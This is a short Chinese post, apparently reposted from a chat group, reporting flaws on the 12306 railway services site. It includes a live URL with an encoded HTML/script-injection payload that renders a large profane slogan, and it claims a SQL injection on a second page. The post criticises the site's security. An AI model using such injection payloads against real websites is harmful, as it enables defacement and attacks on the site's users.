从某群里 发出的
http://hyfw.12306.cn/Dzsw/action/action/FwcszsAction_index?type=--%3E%27%22%3E%3CH1%20style=%22color:red;font-size:100px;%22%3E%E9%A9%AC%E5%8B%92%E9%9A%94%E5%A3%81%E7%9A%84%E8%B4%AA%E5%AE%98%3C%2FH1%3E
第一个 页面的bug
第二个 SQL注入有
希望 公民信息不泄漏才好啊 由此看出 内地的 电子商务安全 相当的儿戏啊